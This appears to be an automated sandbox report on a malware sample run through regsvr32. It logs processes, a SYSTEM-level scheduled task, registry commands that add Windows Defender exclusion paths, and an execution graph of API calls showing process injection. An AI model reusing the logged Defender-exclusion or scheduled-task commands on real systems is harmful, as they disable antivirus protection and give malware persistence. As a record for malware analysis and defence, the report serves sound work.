      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
      Imagebase:0xfc0000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 1724 Parent PID: 2428

      General

      Start time:16:01:11
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa1.der
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 2960 Parent PID: 1672

      General

      Start time:16:01:13
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 2536 Parent PID: 2960

      General

      Start time:16:01:13
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Chronological Activities

      Analysis Process: explorer.exe PID: 236 Parent PID: 1724

      General

      Start time:16:01:36
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 804 Parent PID: 1180

      General

      Start time:16:01:37
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa2.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 152 Parent PID: 804

      General

      Start time:16:01:38
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa2.der
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: explorer.exe PID: 1256 Parent PID: 2536

      General

      Start time:16:01:39
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: reg.exe PID: 2932 Parent PID: 1256

      General

      Start time:16:01:41
      Start date:24/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
      Imagebase:0xff440000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: reg.exe PID: 2788 Parent PID: 1256

      General

      Start time:16:01:42
      Start date:24/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
      Imagebase:0xff930000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: explorer.exe PID: 1408 Parent PID: 152

      General

      Start time:16:02:02
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 2320 Parent PID: 1672

      General

      Start time:16:03:00
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff850000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Analysis Process: regsvr32.exe PID: 2940 Parent PID: 2320

      General

      Start time:16:03:00
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x660000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Chronological Activities

      Disassembly

      Code Analysis

      Reset < >

        Analysis Process: regsvr32.exe PID: 1760 Parent PID: 1912 regsvr32.exeCOMMON

        Execution Graph

        Execution Coverage:5.7%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:8.6%
        Total number of Nodes:1362
        Total number of Limit Nodes:25

        Graph

        execution_graph 11105 10028d00 11106 10028d1a GetSystemDirectoryW 11105->11106 11108 10028e02 VirtualProtectEx 11106->11108 11109 10028df5 11106->11109 11110 10028e3a GetSystemDirectoryW 11108->11110 11109->11108 11112 10028f59 11110->11112 11113 10005f82 OutputDebugStringA 11114 10005fa2 11113->11114 11115 100060cc 11113->11115 11142 100085ef HeapCreate 11114->11142 11117 100060d2 SetLastError 11115->11117 11118 10006097 11115->11118 11117->11118 11119 10005fa7 11143 1000980c GetSystemTimeAsFileTime 11119->11143 11121 10005faf 11121->11118 11145 10008f78 11121->11145 11124 10005ffd 11124->11118 11125 10006006 memset 11124->11125 11129 1000601d 11125->11129 11130 1000604c 11129->11130 11148 100095c7 11129->11148 11155 10012a5b 11130->11155 11137 10006092 11139 100085d5 2 API calls 11137->11139 11138 1000609c 11171 100085d5 11138->11171 11139->11118 11142->11119 11144 1000983e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 11143->11144 11144->11121 11175 10008604 HeapAlloc 11145->11175 11147 10005fcb GetModuleHandleA GetModuleFileNameW GetLastError 11147->11118 11147->11124 11176 100084ab 11148->11176 11151 100085c2 11152 100085d2 11151->11152 11153 100085ca 11151->11153 11152->11129 11181 1000861a 11153->11181 11156 10012a90 11155->11156 11189 10008669 11156->11189 11158 10006057 11159 1000e1bc 11158->11159 11160 100095c7 HeapAlloc 11159->11160 11161 1000e1cf 11160->11161 11162 1000e1e6 11161->11162 11163 1000e1de GetModuleHandleA 11161->11163 11164 1000e1fb 11162->11164 11193 1000e171 11162->11193 11163->11162 11166 100085c2 2 API calls 11164->11166 11167 1000606d 11166->11167 11168 100095e1 11167->11168 11204 10008531 11168->11204 11170 1000607e GetFileAttributesW 11170->11137 11170->11138 11172 100085e3 11171->11172 11173 100060a1 CreateThread 11171->11173 11174 1000861a 2 API calls 11172->11174 11173->11118 11209 10005e06 11173->11209 11174->11173 11175->11147 11177 100084c1 11176->11177 11179 10006024 MultiByteToWideChar 11176->11179 11177->11179 11180 10008604 HeapAlloc 11177->11180 11179->11151 11180->11179 11182 10008666 11181->11182 11183 10008624 11181->11183 11182->11152 11183->11182 11186 1000874f 11183->11186 11187 10008758 memset 11186->11187 11188 10008654 HeapFree 11186->11188 11187->11188 11188->11182 11192 10008604 HeapAlloc 11189->11192 11191 1000867a 11191->11158 11192->11191 11198 10008604 HeapAlloc 11193->11198 11195 1000e183 11196 1000e1b2 11195->11196 11199 1000dfad 11195->11199 11196->11164 11198->11195 11200 1000e021 11199->11200 11201 1000dfc6 11199->11201 11200->11195 11201->11200 11202 1000e079 LoadLibraryA 11201->11202 11202->11200 11203 1000e087 GetProcAddress 11202->11203 11203->11200 11205 1000854d 11204->11205 11208 10008604 HeapAlloc 11205->11208 11207 10008581 11207->11170 11207->11207 11208->11207 11221 10005eb6 11209->11221 11213 10005e11 11217 10005e4b 11213->11217 11220 10005e1b 11213->11220 11285 1000ca25 11213->11285 11215 10005e82 11215->11220 11321 100030b7 11215->11321 11216 10005e7b 11299 10005c26 11216->11299 11217->11215 11217->11216 11222 1000e1bc 6 API calls 11221->11222 11223 10005eca 11222->11223 11224 1000e1bc 6 API calls 11223->11224 11225 10005ee3 11224->11225 11226 1000e1bc 6 API calls 11225->11226 11227 10005efc 11226->11227 11228 1000e1bc 6 API calls 11227->11228 11229 10005f15 11228->11229 11230 1000e1bc 6 API calls 11229->11230 11231 10005f30 11230->11231 11232 1000e1bc 6 API calls 11231->11232 11233 10005f49 11232->11233 11234 1000e1bc 6 API calls 11233->11234 11235 10005f62 11234->11235 11236 1000e1bc 6 API calls 11235->11236 11237 10005e0b 11236->11237 11238 1000d01f 11237->11238 11328 10008604 HeapAlloc 11238->11328 11240 1000d03a 11241 1000d045 GetCurrentProcessId 11240->11241 11284 1000d3f3 11240->11284 11242 1000d05d 11241->11242 11243 1000d072 GetModuleFileNameW 11242->11243 11244 1000d099 GetCurrentProcess 11243->11244 11245 1000d08c 11243->11245 11329 1000ba05 11244->11329 11245->11244 11247 1000d0a8 11248 1000d0b9 11247->11248 11336 1000ba62 11247->11336 11345 1000e3f1 11248->11345 11253 1000d0ee LookupAccountSidW 11254 1000d140 GetModuleFileNameW GetLastError 11253->11254 11255 1000d13e GetLastError 11253->11255 11257 1000d17f 11254->11257 11255->11254 11354 1000b7a8 memset GetComputerNameW lstrcpynW 11257->11354 11259 1000d196 11364 1000b67d 11259->11364 11262 1000d1bd MultiByteToWideChar 11263 1000d1d1 11262->11263 11374 1000b88a 11263->11374 11268 1000d257 11270 1000d261 11268->11270 11271 1000d266 GetSystemInfo 11268->11271 11269 1000d24a GetCurrentProcess IsWow64Process 11269->11268 11272 1000d274 GetWindowsDirectoryW 11270->11272 11271->11272 11273 100095e1 HeapAlloc 11272->11273 11274 1000d297 11273->11274 11275 100085d5 2 API calls 11274->11275 11276 1000d2d1 11275->11276 11278 1000d309 11276->11278 11413 10009640 11276->11413 11393 100122d3 11278->11393 11284->11213 11467 1000c8fd 11285->11467 11288 1000cb6e 11288->11217 11290 1000cb63 11292 1000861a 2 API calls 11290->11292 11291 1000cb51 11291->11290 11293 1000861a 2 API calls 11291->11293 11292->11288 11293->11291 11296 1000cacc GetLastError ResumeThread 11297 1000ca62 11296->11297 11298 1000cafc CloseHandle 11296->11298 11297->11290 11297->11291 11297->11296 11297->11298 11479 1000ae66 memset CreateProcessW 11297->11479 11480 1000cb77 11297->11480 11298->11297 11559 10009b43 11299->11559 11302 10005c51 11302->11220 11303 10005c69 11609 10005d7d 11303->11609 11307 10005cc7 11641 10005aff 11307->11641 11308 10005c78 11309 10005ccc 11308->11309 11310 10005c7d 11308->11310 11312 10005ce8 11309->11312 11320 10005cc5 11309->11320 11654 1000f8cc 11309->11654 11310->11312 11315 1000a86d 5 API calls 11310->11315 11312->11220 11316 10005c9d 11315->11316 11618 10005974 11316->11618 11675 10005a61 11320->11675 12734 10008604 HeapAlloc 11321->12734 11323 100030be 11324 100030f7 11323->11324 12735 10008604 HeapAlloc 11323->12735 11324->11220 11326 100030cf 11326->11324 11327 1000902d _ftol2_sse 11326->11327 11327->11324 11328->11240 11330 1000ba1d 11329->11330 11331 1000ba21 11330->11331 11417 1000b998 GetTokenInformation 11330->11417 11331->11247 11334 1000ba52 CloseHandle 11335 1000ba3e 11334->11335 11335->11247 11427 1000b946 GetCurrentThread OpenThreadToken 11336->11427 11339 1000bb18 11339->11248 11340 1000b998 6 API calls 11344 1000ba96 CloseHandle 11340->11344 11342 1000bb0e 11343 1000861a 2 API calls 11342->11343 11343->11339 11344->11339 11344->11342 11346 1000e410 11345->11346 11348 1000d0e3 11346->11348 11431 100091e3 11346->11431 11349 1000e3b6 11348->11349 11350 1000e3cd 11349->11350 11351 1000e3ed 11350->11351 11352 100091e3 HeapAlloc 11350->11352 11351->11253 11353 1000e3da 11352->11353 11353->11253 11355 100095e1 HeapAlloc 11354->11355 11356 1000b7ff GetVolumeInformationW 11355->11356 11357 100085d5 2 API calls 11356->11357 11358 1000b834 11357->11358 11359 10009640 2 API calls 11358->11359 11360 1000b855 lstrcatW 11359->11360 11436 1000c392 11360->11436 11363 1000b87b 11363->11259 11365 1000b698 11364->11365 11366 100095c7 HeapAlloc 11365->11366 11367 1000b6a2 11366->11367 11438 1001242d 11367->11438 11369 1000b6ed 11370 100085c2 2 API calls 11369->11370 11371 1000b6f9 11370->11371 11371->11262 11371->11263 11372 1001242d _ftol2_sse 11373 1000b6b7 11372->11373 11373->11369 11373->11372 11375 100095c7 HeapAlloc 11374->11375 11376 1000b8a5 11375->11376 11377 100095c7 HeapAlloc 11376->11377 11379 1000b8b1 11377->11379 11378 1000b941 GetCurrentProcess 11387 1000bbdf 11378->11387 11379->11378 11380 1001242d _ftol2_sse 11379->11380 11381 1000b902 11379->11381 11380->11379 11382 1001242d _ftol2_sse 11381->11382 11383 1000b92d 11381->11383 11382->11381 11384 100085c2 2 API calls 11383->11384 11385 1000b939 11384->11385 11386 100085c2 2 API calls 11385->11386 11386->11378 11388 1000bbf7 11387->11388 11389 1000b998 6 API calls 11388->11389 11390 1000bbfb memset GetVersionExA 11388->11390 11392 1000bc0f 11389->11392 11390->11268 11390->11269 11391 1000861a 2 API calls 11391->11390 11392->11390 11392->11391 11394 1000d3d2 11393->11394 11395 100122de 11393->11395 11397 1000902d 11394->11397 11395->11394 11396 1001242d _ftol2_sse 11395->11396 11396->11395 11398 1000903d 11397->11398 11398->11398 11399 1001242d _ftol2_sse 11398->11399 11402 10009058 11399->11402 11400 1000908c 11403 1000cd33 11400->11403 11401 1001242d _ftol2_sse 11401->11402 11402->11400 11402->11401 11404 1000cf18 11403->11404 11405 100095c7 HeapAlloc 11404->11405 11406 1000cf48 11404->11406 11409 100085c2 2 API calls 11404->11409 11448 100093be 11404->11448 11405->11404 11441 1000aba3 CreateToolhelp32Snapshot 11406->11441 11409->11404 11410 1000cf5f 11412 1000cf7c 11410->11412 11454 100094b7 11410->11454 11412->11284 11414 1000874f memset 11413->11414 11415 10009654 _vsnwprintf 11414->11415 11416 10009671 11415->11416 11416->11278 11418 1000b9ba GetLastError 11417->11418 11419 1000b9d7 11417->11419 11418->11419 11420 1000b9c5 11418->11420 11419->11334 11419->11335 11426 10008604 HeapAlloc 11420->11426 11422 1000b9cd 11422->11419 11423 1000b9db GetTokenInformation 11422->11423 11423->11419 11424 1000b9f0 11423->11424 11425 1000861a 2 API calls 11424->11425 11425->11419 11426->11422 11428 1000b98e 11427->11428 11429 1000b967 GetLastError 11427->11429 11428->11339 11428->11340 11429->11428 11430 1000b974 GetCurrentProcess OpenProcessToken 11429->11430 11430->11428 11432 100091ec 11431->11432 11434 100091fe 11431->11434 11435 10008604 HeapAlloc 11432->11435 11434->11348 11435->11434 11437 1000b867 CharUpperBuffW 11436->11437 11437->11363 11439 1001243c 11438->11439 11440 10012480 _ftol2_sse 11439->11440 11440->11373 11442 1000abc9 memset Process32First 11441->11442 11444 1000abf4 11441->11444 11442->11444 11445 1000ac02 11442->11445 11444->11410 11446 1000ac15 Process32Next 11445->11446 11447 1000ac28 CloseHandle 11445->11447 11460 1000ccc0 11445->11460 11446->11445 11446->11447 11447->11444 11450 100093d2 11448->11450 11465 10008604 HeapAlloc 11450->11465 11451 100094a1 11451->11404 11453 1000942a 11453->11451 11466 10008604 HeapAlloc 11453->11466 11457 10009503 11454->11457 11459 100094c8 11454->11459 11455 100094fa 11456 1000861a 2 API calls 11455->11456 11456->11457 11457->11410 11458 1000861a 2 API calls 11458->11459 11459->11455 11459->11457 11459->11458 11461 1000ccd0 11460->11461 11462 1000cd1f Sleep 11460->11462 11463 1000ccea lstrcmpi 11461->11463 11464 1000cd1e 11461->11464 11462->11445 11463->11461 11464->11462 11465->11453 11466->11453 11468 1000c91c 11467->11468 11495 10008604 HeapAlloc 11468->11495 11470 1000ca14 11470->11288 11475 1000a86d 11470->11475 11471 100095e1 HeapAlloc 11473 1000c9b7 11471->11473 11472 100085d5 2 API calls 11472->11473 11473->11470 11473->11471 11473->11472 11474 100091e3 HeapAlloc 11473->11474 11474->11473 11476 1000a886 11475->11476 11496 1000a7bc 11476->11496 11479->11297 11509 1000c4ce 11480->11509 11483 1000cc72 FreeLibrary 11486 1000cc80 11483->11486 11485 1000cca1 11485->11297 11486->11485 11489 1000861a 2 API calls 11486->11489 11488 1000cbaa memset 11490 1000cbdf 11488->11490 11489->11485 11491 1000cbe7 NtProtectVirtualMemory 11490->11491 11492 1000cc67 11490->11492 11491->11492 11493 1000cc29 NtWriteVirtualMemory 11491->11493 11492->11483 11492->11486 11493->11492 11494 1000cc46 NtProtectVirtualMemory 11493->11494 11494->11492 11495->11473 11497 100122d3 _ftol2_sse 11496->11497 11498 1000a7d4 11497->11498 11499 100095c7 HeapAlloc 11498->11499 11500 1000a7fe 11499->11500 11505 10009601 11500->11505 11502 1000a85c 11503 100085c2 2 API calls 11502->11503 11504 1000a867 11503->11504 11504->11297 11506 1000874f memset 11505->11506 11507 10009615 _vsnprintf 11506->11507 11508 1000962f 11507->11508 11508->11502 11510 1000c4ea 11509->11510 11511 1000c4fc 11509->11511 11510->11511 11512 1000c627 11510->11512 11513 100095e1 HeapAlloc 11511->11513 11512->11492 11534 1000c6c0 11512->11534 11514 1000c509 11513->11514 11515 10009640 2 API calls 11514->11515 11516 1000c542 11515->11516 11517 100095e1 HeapAlloc 11516->11517 11518 1000c55f 11517->11518 11552 100092e5 11518->11552 11521 100085d5 2 API calls 11522 1000c587 11521->11522 11523 100092e5 2 API calls 11522->11523 11524 1000c5aa LoadLibraryW 11523->11524 11526 1000c5d5 11524->11526 11527 1000c5e3 11524->11527 11528 1000e171 3 API calls 11526->11528 11529 1000861a 2 API calls 11527->11529 11528->11527 11530 1000c5f8 memset 11529->11530 11530->11512 11531 1000c619 11530->11531 11532 1000861a 2 API calls 11531->11532 11533 1000c625 11532->11533 11533->11512 11535 1000c6f4 11534->11535 11536 1000c715 NtCreateSection 11535->11536 11551 1000c880 11535->11551 11537 1000c73e RegisterClassExA 11536->11537 11536->11551 11538 1000c790 CreateWindowExA 11537->11538 11539 1000c7cc GetCurrentProcess NtMapViewOfSection 11537->11539 11538->11539 11544 1000c7ba DestroyWindow UnregisterClassA 11538->11544 11545 1000c7f7 NtMapViewOfSection 11539->11545 11539->11551 11540 1000c8d2 GetCurrentProcess NtUnmapViewOfSection 11541 1000c8e5 11540->11541 11542 1000c8f8 11541->11542 11543 1000c8ed NtClose 11541->11543 11542->11488 11542->11492 11543->11542 11544->11539 11546 1000c81e 11545->11546 11545->11551 11547 10008669 HeapAlloc 11546->11547 11548 1000c82e 11547->11548 11549 1000c839 VirtualAllocEx WriteProcessMemory 11548->11549 11548->11551 11550 1000861a 2 API calls 11549->11550 11550->11551 11551->11540 11551->11541 11554 100092f7 11552->11554 11558 10008604 HeapAlloc 11554->11558 11555 10009333 11555->11521 11556 10009316 11556->11555 11557 10009322 lstrcatW 11556->11557 11557->11556 11558->11556 11679 10008604 HeapAlloc 11559->11679 11561 10009b6d 11562 10005c45 11561->11562 11680 1000b5f6 11561->11680 11562->11302 11562->11303 11598 1000fb19 11562->11598 11565 100095c7 HeapAlloc 11566 10009bb0 11565->11566 11567 10009ceb 11566->11567 11572 10009bdc 11566->11572 11568 10009d3c 11567->11568 11569 10009cfd 11567->11569 11570 10009292 2 API calls 11568->11570 11571 10009ce7 11569->11571 11573 10009292 2 API calls 11569->11573 11570->11571 11574 100085c2 2 API calls 11571->11574 11572->11571 11690 10009292 11572->11690 11573->11571 11576 10009d5c 11574->11576 11577 1000861a 2 API calls 11576->11577 11585 10009db2 11576->11585 11578 10009d9b memset 11577->11578 11580 1000861a 2 API calls 11578->11580 11580->11585 11581 100095e1 HeapAlloc 11582 10009c3f 11581->11582 11583 100092e5 2 API calls 11582->11583 11586 10009c51 11583->11586 11584 10009292 2 API calls 11590 10009cc8 11584->11590 11585->11585 11587 1000861a 2 API calls 11585->11587 11588 100085d5 2 API calls 11586->11588 11587->11562 11589 10009c5f 11588->11589 11696 10009256 11589->11696 11591 1000861a 2 API calls 11590->11591 11591->11571 11594 1000861a 2 API calls 11595 10009c96 11594->11595 11596 1000861a 2 API calls 11595->11596 11597 10009ca1 11596->11597 11597->11584 11704 10008604 HeapAlloc 11598->11704 11600 1000fb20 11601 1000fb2a 11600->11601 11705 1000a6a9 11600->11705 11601->11303 11604 1000fb6e 11604->11303 11606 1000fb55 11607 1000f8cc 15 API calls 11606->11607 11608 1000fb6b 11607->11608 11608->11303 11610 1000a86d 5 API calls 11609->11610 11611 10005d9a 11610->11611 11612 10005974 8 API calls 11611->11612 11614 10005c6e 11611->11614 11613 10005dd4 11612->11613 11613->11614 11737 10009ebb 11613->11737 11614->11307 11614->11308 11617 10005de6 lstrcmpiW 11617->11614 11619 1000a86d 5 API calls 11618->11619 11620 1000598d 11619->11620 11621 10009292 2 API calls 11620->11621 11622 1000599a 11620->11622 11623 100059bd 11621->11623 11761 1000590c 11623->11761 11625 100059cd 11626 100059f1 11625->11626 11629 1000590c 2 API calls 11625->11629 11627 1000861a 2 API calls 11626->11627 11628 100059fd 11627->11628 11630 10005bc4 11628->11630 11629->11626 11631 10009ebb 3 API calls 11630->11631 11632 10005bce 11631->11632 11633 10005bdc lstrcmpiW 11632->11633 11639 10005bd7 11632->11639 11634 10005bf2 11633->11634 11635 10005c14 11633->11635 11766 10009f6c 11634->11766 11636 1000861a 2 API calls 11635->11636 11636->11639 11639->11320 11809 10008604 HeapAlloc 11641->11809 11643 10005b11 11644 10005b24 GetDriveTypeW 11643->11644 11645 10005b55 11643->11645 11644->11645 11810 10005a7b 11645->11810 11647 10005b71 11648 10005ba1 11647->11648 11827 10004d6d 11647->11827 11913 1000a39e 11648->11913 11652 1000a39e 2 API calls 11653 10005bbd 11652->11653 11653->11309 11655 1000109a HeapAlloc 11654->11655 11656 1000f8db 11655->11656 12414 100061b4 memset 11656->12414 11659 100085d5 2 API calls 11660 1000f901 11659->11660 11674 1000f978 11660->11674 12426 10009e66 11660->12426 11664 1000f92c 11665 1000109a HeapAlloc 11664->11665 11664->11674 11666 1000f93e 11665->11666 11667 10009640 2 API calls 11666->11667 11668 1000f94d 11667->11668 11669 1000a911 2 API calls 11668->11669 11670 1000f95e 11669->11670 11671 1000f96c 11670->11671 12432 1000a239 11670->12432 11673 1000861a 2 API calls 11671->11673 11673->11674 11674->11320 11676 10005a73 11675->11676 12440 10005631 11676->12440 11679->11561 11681 1000b60f 11680->11681 11682 1001242d _ftol2_sse 11681->11682 11683 1000b61f 11682->11683 11684 100095c7 HeapAlloc 11683->11684 11685 1000b62e 11684->11685 11686 1000b66a 11685->11686 11689 1001242d _ftol2_sse 11685->11689 11687 100085c2 2 API calls 11686->11687 11688 10009b91 11687->11688 11688->11565 11689->11685 11691 100092a4 11690->11691 11702 10008604 HeapAlloc 11691->11702 11693 100092c1 11694 100092cd lstrcatA 11693->11694 11695 100092de 11693->11695 11694->11693 11695->11576 11695->11581 11695->11597 11697 1000928c 11696->11697 11698 1000925f 11696->11698 11697->11594 11703 10008604 HeapAlloc 11698->11703 11700 10009271 11700->11697 11701 10009279 MultiByteToWideChar 11700->11701 11701->11697 11702->11693 11703->11700 11704->11600 11706 1000a6c2 11705->11706 11710 1000a6bb 11705->11710 11709 1000a6f0 11706->11709 11706->11710 11732 10008604 HeapAlloc 11706->11732 11708 1000861a 2 API calls 11708->11710 11709->11708 11709->11710 11710->11604 11711 1000f9bf 11710->11711 11733 10008604 HeapAlloc 11711->11733 11713 1000f9d2 11715 1000fabc 11713->11715 11720 1000fb10 11713->11720 11734 1000109a 11713->11734 11718 1000861a 2 API calls 11715->11718 11717 100095e1 HeapAlloc 11719 1000fa2c 11717->11719 11718->11720 11721 100092e5 2 API calls 11719->11721 11720->11606 11722 1000fa49 11721->11722 11723 1000a6a9 3 API calls 11722->11723 11724 1000fa56 11723->11724 11725 100085d5 2 API calls 11724->11725 11726 1000fa62 11725->11726 11727 100085d5 2 API calls 11726->11727 11730 1000fa6b 11727->11730 11728 1000861a 2 API calls 11729 1000fab1 11728->11729 11731 1000861a 2 API calls 11729->11731 11730->11728 11731->11715 11732->11709 11733->11713 11735 10008531 HeapAlloc 11734->11735 11736 100010b5 11735->11736 11736->11717 11740 10009f95 11737->11740 11741 10009fbe 11740->11741 11752 10009b0e 11741->11752 11743 10005de2 11743->11614 11743->11617 11744 10009fc9 11744->11743 11755 1000be9b 11744->11755 11746 1000a095 11747 1000861a 2 API calls 11746->11747 11747->11743 11748 1000a070 11750 1000861a 2 API calls 11748->11750 11749 10009ffd 11749->11746 11749->11748 11751 10008669 HeapAlloc 11749->11751 11750->11746 11751->11748 11759 10008604 HeapAlloc 11752->11759 11754 10009b1a 11754->11744 11756 1000bec1 11755->11756 11758 1000bec5 11756->11758 11760 10008604 HeapAlloc 11756->11760 11758->11749 11759->11754 11760->11758 11762 10005917 11761->11762 11763 1000591c 11761->11763 11762->11625 11764 10005934 GetLastError 11763->11764 11765 1000593f GetLastError 11763->11765 11764->11762 11765->11762 11767 10009f7c 11766->11767 11782 1000a0ab 11767->11782 11770 1000b1b1 SetFileAttributesW memset 11771 1000b1ec 11770->11771 11772 1001242d _ftol2_sse 11771->11772 11781 1000b1ff 11771->11781 11773 1000b21b 11772->11773 11774 10009640 2 API calls 11773->11774 11775 1000b22c 11774->11775 11776 100092e5 2 API calls 11775->11776 11777 1000b23d 11776->11777 11777->11781 11797 1000b0de 11777->11797 11780 1000861a 2 API calls 11780->11781 11781->11635 11783 1000a0c8 11782->11783 11787 10005c08 11782->11787 11784 1001242d _ftol2_sse 11783->11784 11783->11787 11785 1000a112 11784->11785 11796 10008604 HeapAlloc 11785->11796 11787->11635 11787->11770 11788 1000a126 11788->11787 11789 100122d3 _ftol2_sse 11788->11789 11790 1000a168 11789->11790 11791 10009b0e HeapAlloc 11790->11791 11794 1000a1b4 11791->11794 11792 1000a21e 11793 1000861a 2 API calls 11792->11793 11793->11787 11794->11792 11795 1000861a 2 API calls 11794->11795 11795->11792 11796->11788 11798 1000b101 11797->11798 11799 1000b109 memset 11798->11799 11808 1000b178 11798->11808 11800 100095e1 HeapAlloc 11799->11800 11801 1000b125 11800->11801 11802 1001242d _ftol2_sse 11801->11802 11803 1000b141 11802->11803 11804 10009640 2 API calls 11803->11804 11805 1000b157 11804->11805 11806 100085d5 2 API calls 11805->11806 11807 1000b160 MoveFileW 11806->11807 11807->11808 11808->11780 11809->11643 11921 10001080 11810->11921 11815 100085c2 2 API calls 11816 10005ab7 11815->11816 11817 10005af7 11816->11817 11818 10001080 HeapAlloc 11816->11818 11817->11647 11819 10005ac5 11818->11819 11931 10008910 11819->11931 11822 10005ae1 11824 100085c2 2 API calls 11822->11824 11825 10005aeb 11824->11825 11826 1000861a 2 API calls 11825->11826 11826->11817 11828 10004d91 11827->11828 11829 10004de7 11827->11829 11831 100095c7 HeapAlloc 11828->11831 11830 1000b7a8 10 API calls 11829->11830 11841 10004e1d 11829->11841 11832 10004dfc 11830->11832 11833 10004d9b 11831->11833 11834 1000a86d 5 API calls 11832->11834 11835 100095c7 HeapAlloc 11833->11835 11836 10004e08 11834->11836 11837 10004dab 11835->11837 12027 1000a471 11836->12027 11837->11829 11840 10004db9 GetModuleHandleA 11837->11840 11839 10004e14 11839->11841 11844 1000e1bc 6 API calls 11839->11844 11842 10004dc6 GetModuleHandleA 11840->11842 11843 10004dcd 11840->11843 11841->11648 11842->11843 11846 100085c2 2 API calls 11843->11846 11845 10004e37 11844->11845 11847 100095e1 HeapAlloc 11845->11847 11848 10004dde 11846->11848 11850 10004e48 11847->11850 11849 100085c2 2 API calls 11848->11849 11849->11829 11851 100092e5 2 API calls 11850->11851 11852 10004e60 11851->11852 11853 100085d5 2 API calls 11852->11853 11855 10004e73 11853->11855 11854 10004e9c 11857 1000861a 2 API calls 11854->11857 11855->11854 12032 1000896f 11855->12032 11859 10004ead 11857->11859 11858 10004e8f 11858->11854 11861 1000a2e3 6 API calls 11858->11861 12052 10004a0b memset 11859->12052 